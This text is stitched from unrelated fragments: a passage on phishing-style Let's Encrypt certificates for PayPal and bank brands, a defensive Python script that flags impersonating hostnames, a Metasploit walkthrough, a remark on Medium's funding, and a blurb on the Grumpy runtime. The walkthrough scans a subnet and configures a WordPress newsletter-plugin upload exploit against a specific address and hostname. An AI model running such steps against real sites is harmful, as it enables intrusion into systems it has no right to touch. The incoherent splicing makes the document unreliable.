By December 8, 2016, Let's Encrypt had issued 409 certificates containing “Paypal” in the hostname; that number is up to 709 as of this morning. Other targets include BankOfAmerica (14 certificates), Apple, Amazon, American Express, Chase Bank, Microsoft, Google, and many other major brands. Let's Encrypt validates only that (at one point in time) the certificate applicant can publish on the target domain; the CA also grudgingly checks with the SafeBrowsing service to see if the target domain has already been blocked as malicious, although they “disagree” that this should be their responsibility. Let's Encrypt’s short position paper is worth a read; many reasonable people agree with it.
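A defender can watch for this pattern by checking certificate hostnames for a brand name that appears outside the brand's own domain. The following is an added example, not code from the original page; the allowlist, the sample hostnames and the function names are assumptions made for illustration.

```python
# Added example (not from the original page): flag certificate hostnames that
# contain a brand name but do not sit under a domain the brand owns.

# Illustrative allowlist (assumption): brand keyword -> domains the brand owns.
BRAND_DOMAINS = {
    "paypal": {"paypal.com"},
    "bankofamerica": {"bankofamerica.com"},
}

# Constructed sample of hostnames as they might appear in certificate SAN
# entries; the .example names are made up for this illustration.
SAMPLE_HOSTNAMES = [
    "www.paypal.com",
    "PayPal.com.account-verify.example",
    "secure-paypal-login.example",
    "*.bankofamerica.com",
    "bankofamerica.signin.example",
    "mypaypal.com.example.",
    "blog.example",
]

def normalize(hostname):
    """Lowercase, drop a trailing dot and a leading wildcard label."""
    host = hostname.strip().lower().rstrip(".")
    return host[2:] if host.startswith("*.") else host

def is_owned(host, owned_domains):
    """True only if host is an owned domain or a subdomain of one.

    Matching on the dot-delimited suffix is the point: a substring test
    would treat 'paypal.com.account-verify.example' as PayPal's own host.
    """
    return any(host == d or host.endswith("." + d) for d in owned_domains)

def find_impersonations(hostnames, brand_domains=BRAND_DOMAINS):
    """Return (hostname, brand) pairs that use a brand outside its domains."""
    hits = []
    for raw in hostnames:
        host = normalize(raw)
        for brand, owned in brand_domains.items():
            if brand in host and not is_owned(host, owned):
                hits.append((host, brand))
    return hits

if __name__ == "__main__":
    for host, brand in find_impersonations(SAMPLE_HOSTNAMES):
        print(f"{brand}: {host}")
```
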
This will save the results to the Metasploit database:
msf > nmap -v -sV 192.168.111.0/24 -oA subnet_1
hosts will list all the hosts found by nmap.
hosts -R will add them to the list of hosts to exploit.
Searching for a WordPress Vulnerability
msf > search name:wordpress
Use an Exploit
This will select an exploit to use:
msf > use exploit/unix/webapp/wp_wysija_newsletters_upload
This will show you the attacks that the exploit will take advantage of:
msf exploit(wp_wysija_newsletters_upload) > show payloads
This will show what software and version will be targeted:
msf exploit(wp_wysija_newsletters_upload) > show targets
0 wysija-newsletters < 2.6.8
Next configure the Exploit
msf exploit(wp_wysija_newsletters_upload) > show options
Module options (exploit/unix/webapp/wp_wysija_newsletters_upload):

   Name       Current Settings  Required  Description
   ----       ----------------  --------  -----------
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                        no        The target address
   RPORT      80                yes       The target port
   SSL        false             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                 no        The base path to the wordpress application
   VHOST                        no        HTTP server virtual host

0 wysija-newsletters < 2.6.8
Here is where we set all the options:
msf exploit(wp_wysija_newsletters_upload) > set RHOST 126.96.36.199
msf exploit(wp_wysija_newsletters_upload) > set RPORT 443
msf exploit(wp_wysija_newsletters_upload) > set SSL true
msf exploit(wp_wysija_newsletters_upload) > set VHOST myles.life
But I don’t think we’ll grow old together, Medium and I. I suspect it’ll end quite tragic, actually. $132,000,000 is a lot of money after all, and that’s how much venture capital Medium has been dipped in. Before having a prayer or a song about how to turn into that multi-billion-dollar business it must to satisfy the required rate of return.
Grumpy is an experimental Python runtime for Go. It translates Python code into Go programs, and those transpiled programs run seamlessly within the Go runtime. We needed to support a large existing Python codebase, so it was important to have a high degree of compatibility with CPython (quirks and all). The goal is for Grumpy to be a drop-in replacement runtime for any pure-Python project.